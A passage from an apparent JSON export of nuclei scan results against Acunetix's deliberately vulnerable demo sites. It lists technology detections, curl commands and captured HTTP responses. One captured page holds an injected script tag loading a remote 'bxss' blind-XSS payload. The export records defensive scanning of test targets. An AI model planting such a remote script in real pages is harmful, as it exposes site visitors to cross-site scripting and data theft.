class="close" data-dismiss="modal" aria-hidden="true">×</button>\n <h3 id="myModalLabel">Login</h3>\n </div>\n <div class="modal-body">\n <div class="control-group">\n <!-- Username -->\n <label class="control-label" for="username">Username</label>\n <div class="controls">\n <input type="text" id="username" name="username" placeholder="" class="input-xlarge" value="admin">\n </div>\n </div>\n\n <div class="control-group">\n <!-- Password-->\n <label class="control-label" for="password">Password</label>\n <div class="controls">\n <input type="password" id="password" name="password" placeholder="" class="input-xlarge">\n </div>\n </div>\n\n <div class="control-group">\n <a href="#" class="btn" id="loginFormForgot">Forgot Pwd?</a>\n </div>\n\n </div>\n <div class="modal-footer">\n <button class="btn btn-primary" id="loginFormSubmit">Login</button>\n <button class="btn" data-dismiss="modal" aria-hidden="true">Close</button>\n </div>\n </form>\n</div>\n\n<!-- Le javascript\n================================================== -->\n<!-- Placed at the end of the document so the pages load faster -->\n<script src="http://code.jquery.com/jquery-1.9.1.min.js"></script>\n<script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"></script>\n<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"></script>\n\n<!-- App libs -->\n\n<script src="/static/app/app.js"></script>\n<script src="/static/app/libs/sessvars.js"></script>\n<script src="/static/app/post.js"></script>\n<script src="/static/app/controllers/controllers.js"></script>\n<script src="/static/app/services/itemsService.js"></script>\n<script src="http://bxss.s3.amazonaws.com/ad.js"></script>\n\n\n</body>\n</html>", + "is_llm_used": false, + "tags": [ + 5 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 170, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/php-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/php-detect", + "template_id": "php-detect", + "matcher_name": "", + "name": "PHP Detect", + "severity": 0, + "description": "", + "impact": null, + "remediation": null, + "extracted_results": "[\"5.6.40\"]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3", + "discovered_date": "2024-11-13T02:34:49.249Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-1/3 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:34:43 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Network Storage D-Link DNS-313 enclosure 1 x SATA</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 5, + 11 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 171, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/tech-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/tech-detect", + "template_id": "tech-detect", + "matcher_name": "nginx", + "name": "Wappalyzer Technology Detection", + "severity": 0, + "description": "", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0' 'http://testphp.vulnweb.com/CVS/Repository'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/CVS/Repository", + "discovered_date": "2024-11-13T02:34:49.333Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /CVS/Repository HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 8\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:34:46 GMT\r\nEtag: "4dca64a4-8"\r\nLast-Modified: Wed, 11 May 2011 10:27:48 GMT\r\nServer: nginx/1.19.0\r\n\r\nacupart\n", + "is_llm_used": false, + "tags": [ + 5 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 172, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/tech-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/tech-detect", + "template_id": "tech-detect", + "matcher_name": "nginx", + "name": "Wappalyzer Technology Detection", + "severity": 0, + "description": "", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:24.0) Gecko/20100101 Firefox/24.0' 'http://testphp.vulnweb.com/CVS/Entries'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/CVS/Entries", + "discovered_date": "2024-11-13T02:34:49.405Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /CVS/Entries HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 5.2; rv:24.0) Gecko/20100101 Firefox/24.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 1\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:34:46 GMT\r\nEtag: "4dca64a4-1"\r\nLast-Modified: Wed, 11 May 2011 10:27:48 GMT\r\nServer: nginx/1.19.0\r\n\r\n ", + "is_llm_used": false, + "tags": [ + 5 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 173, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/tech-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/tech-detect", + "template_id": "tech-detect", + "matcher_name": "nginx", + "name": "Wappalyzer Technology Detection", + "severity": 0, + "description": "", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1 Safari/605.1.15' 'http://testphp.vulnweb.com/.idea/.name'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/.idea/.name", + "discovered_date": "2024-11-13T02:34:49.485Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /.idea/.name HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 6\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:34:46 GMT\r\nEtag: "4f911cd6-6"\r\nLast-Modified: Fri, 20 Apr 2012 08:22:46 GMT\r\nServer: nginx/1.19.0\r\n\r\nacuart", + "is_llm_used": false, + "tags": [ + 5 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 174, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/tech-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/tech-detect", + "template_id": "tech-detect", + "matcher_name": "nginx", + "name": "Wappalyzer Technology Detection", + "severity": 0, + "description": "", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66' 'http://testphp.vulnweb.com/CVS/Entries.Log'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/CVS/Entries.Log", + "discovered_date": "2024-11-13T02:34:49.561Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /CVS/Entries.Log HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 1\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:34:46 GMT\r\nEtag: "4dca64a4-1"\r\nLast-Modified: Wed, 11 May 2011 10:27:48 GMT\r\nServer: nginx/1.19.0\r\n\r\n ", + "is_llm_used": false, + "tags": [ + 5 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 175, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/php-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/php-detect", + "template_id": "php-detect", + "matcher_name": "", + "name": "PHP Detect", + "severity": 0, + "description": "", + "impact": null, + "remediation": null, + "extracted_results": "[\"5.6.40\"]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15' 'http://testphp.vulnweb.com'", + "type": "http", + "http_url": "http://testphp.vulnweb.com", + "discovered_date": "2024-11-13T02:34:49.639Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET / HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:34:43 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"\n"http://www.w3.org/TR/html4/loose.dtd">\n<html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" -->\n<head>\n<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2">\n\n<!-- InstanceBeginEditable name="document_title_rgn" -->\n<title>Home of Acunetix Art</title>\n<!-- InstanceEndEditable -->\n<link rel="stylesheet" href="style.css" type="text/css">\n<!-- InstanceBeginEditable name="headers_rgn" -->\n<!-- here goes headers headers -->\n<!-- InstanceEndEditable -->\n<script language="JavaScript" type="text/JavaScript">\n<!--\nfunction MM_reloadPage(init) { //reloads the window if Nav4 resized\n if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) {\n document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}\n else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();\n}\nMM_reloadPage(true);\n//-->\n</script>\n\n</head>\n<body> \n<div id="mainLayer" style="position:absolute; width:700px; z-index:1">\n<div id="masthead"> \n <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> \n <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6>\n <div id="globalNav"> \n \t<table border="0" cellpadding="0" cellspacing="0" width="100%"><tr>\n\t<td align="left">\n\t\t<a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists\n\t\t</a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | \n\t\t<a href="guestbook.php">guestbook</a> | \n\t\t<a href="AJAX/index.php">AJAX Demo</a>\n\t</td>\n\t<td align="right">\n\t\t</td>\n\t</tr></table>\n </div> \n</div> \n<!-- end masthead --> \n\n<!-- begin content -->\n<!-- InstanceBeginEditable name="content_rgn" -->\n<div id="content">\n\t<h2 id="pageName">welcome to our page</h2>\n\t <div class="story">\n\t\t<h3>Test site for Acunetix WVS.</h3>\n\t </div>\n</div>\n<!-- InstanceEndEditable -->\n<!--end content -->\n\n<div id="navBar"> \n <div id="search"> \n <form action="search.php?test=query" method="post"> \n <label>search art</label> \n <input name="searchFor" type="text" size="10"> \n <input name="goButton" type="submit" value="go"> \n </form> \n </div> \n <div id="sectionLinks"> \n <ul> \n <li><a href="categories.php">Browse categories</a></li> \n <li><a href="artists.php">Browse artists</a></li> \n <li><a href="cart.php">Your cart</a></li> \n <li><a href="login.php">Signup</a></li>\n\t <li><a href="userinfo.php">Your profile</a></li>\n\t <li><a href="guestbook.php">Our guestbook</a></li>\n\t\t<li><a href="AJAX/index.php">AJAX Demo</a></li>\n\t </li> \n </ul> \n </div> \n <div class="relatedLinks"> \n <h3>Links</h3> \n <ul> \n <li><a href="http://www.acunetix.com">Security art</a></li> \n\t <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li>\n\t <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li>\n\t <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> \n </ul> \n </div> \n <div id="advert"> \n <p>\n <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66">\n <param name="movie" value="Flash/add.swf">\n <param name=quality value=high>\n <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed>\n </object>\n </p>\n </div> \n</div> \n\n<!--end navbar --> \n<div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | <a href="/Mod_Rewrite_Shop/">Shop</a> | <a href="/hpp/">HTTP Parameter Pollution</a> | &copy;2019\n Acunetix Ltd \n</div> \n \n \n<br> \n<div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px">\n<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p>\n</div>\n</div>\n</body>\n<!-- InstanceEnd --></html>\n", + "is_llm_used": false, + "tags": [ + 5, + 11 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 176, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/tech-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/tech-detect", + "template_id": "tech-detect", + "matcher_name": "nginx", + "name": "Wappalyzer Technology Detection", + "severity": 0, + "description": "", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:52.0) Gecko/20100101 Firefox/52.0' 'http://testhtml5.vulnweb.com/comment'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/comment", + "discovered_date": "2024-11-13T02:34:49.805Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /comment HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:52.0) Gecko/20100101 Firefox/52.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:34:36 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE html>\n<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp">\n<head>\n <meta charset="utf-8">\n <title>SecurityTweets</title>\n <meta name="viewport" content="width=device-width, initial-scale=1.0">\n <meta name="description" content="">\n <meta name="author" content="">\n\n <!-- Le styles -->\n <link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet">\n <!--<link href="http://netdna.bootstrapcdn.com/font-awesome/3.0.2/css/font-awesome.css" rel="stylesheet">-->\n <link href='http://fonts.googleapis.com/css?family=Open+Sans:700' rel='stylesheet' type='text/css'>\n <link href="/static/css/style.css" rel="stylesheet">\n <style type="text/css">\n body {\n padding-top: 60px;\n padding-bottom: 40px;\n }\n .sidebar-nav {\n padding: 9px 0;\n }\n\n @media (max-width: 980px) {\n /* Enable use of floated navbar text */\n .navbar-text.pull-right {\n float: none;\n padding-left: 5px;\n padding-right: 5px;\n }\n }\n </style>\n</head>\n\n<body>\n\n<div class="navbar navbar-fixed-top">\n <div class="navbar-inner">\n <div class="container-fluid">\n <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n </button>\n <a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security">&nbsp;&nbsp;&nbsp;&nbsp;</a>\n <p class="navbar-text pull-left">\n HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>.\n </p>\n </div>\n </div>\n</div>\n\n<div class="container-fluid">\n <div class="row-fluid">\n <div class="span2">\n <div class="well sidebar-nav">\n <ul class="nav nav-list">\n <li class="nav-header">Action</li>\n <li class="active"><a href="#/response">Response</a></li>\n\n <li class="nav-header">Acunetix</li>\n <li><a target="_blank" href="http://www.acunetix.com/">Website</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li>\n <li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li>\n <li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li>\n <li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li>\n </ul>\n </div><!--/.well -->\n </div><!--/span-->\n <div class="span10">\n <div class="row-fluid">\n \n Sorry, but commenting is currently disabled! <!-- invalid -->\n \n </div><!--/row-->\n </div><!--/span-->\n </div><!--/row-->\n\n <hr>\n\t\n\t<div style="background-color:lightgray;width:100%;text-align:center;font-size:14px">\n\t\t<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p>\n\t</div>\n\n <footer>\n <p>&copy; Acunetix Ltd. 2019</p>\n </footer>\n\n</div><!--/.fluid-container-->\n\n<!-- Le javascript\n================================================== -->\n<!-- Placed at the end of the document so the pages load faster -->\n<script src="http://code.jquery.com/jquery-1.9.1.min.js"></script>\n<script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"></script>\n<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"></script>\n<script src="/static/app/app.js"></script>\n\n</body>\n</html>", + "is_llm_used": false, + "tags": [ + 5 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 177, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/php-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/php-detect", + "template_id": "php-detect", + "matcher_name": "", + "name": "PHP Detect", + "severity": 0, + "description": "", + "impact": null, + "remediation": null, + "extracted_results": "[\"5.6.40\"]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36 Edg/89.0.774.45' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/A01'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/A01", + "discovered_date": "2024-11-13T02:34:49.885Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-1/A01 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36 Edg/89.0.774.45\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:34:45 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Network Storage D-Link DNS-313 enclosure 1 x SATA</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 5, + 11 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 178, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/php-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/php-detect", + "template_id": "php-detect", + "matcher_name": "", + "name": "PHP Detect", + "severity": 0, + "description": "", + "impact": null, + "remediation": null, + "extracted_results": "[\"5.6.40\"]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.34' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3L'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3L", + "discovered_date": "2024-11-13T02:34:50.000Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-1/3L HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.34\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:34:44 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Network Storage D-Link DNS-313 enclosure 1 x SATA</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 5, + 11 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 179, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/php-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/php-detect", + "template_id": "php-detect", + "matcher_name": "", + "name": "PHP Detect", + "severity": 0, + "description": "", + "impact": null, + "remediation": null, + "extracted_results": "[\"5.6.40\"]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3", + "discovered_date": "2024-11-13T02:34:50.103Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-2/3 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:34:45 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Web Camera A4Tech PK-335E</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 5, + 11 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 180, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/tech-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/tech-detect", + "template_id": "tech-detect", + "matcher_name": "nginx", + "name": "Wappalyzer Technology Detection", + "severity": 0, + "description": "", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3' 'http://testphp.vulnweb.com/.idea'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/.idea", + "discovered_date": "2024-11-13T02:34:50.182Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /.idea HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:34:46 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>Index of 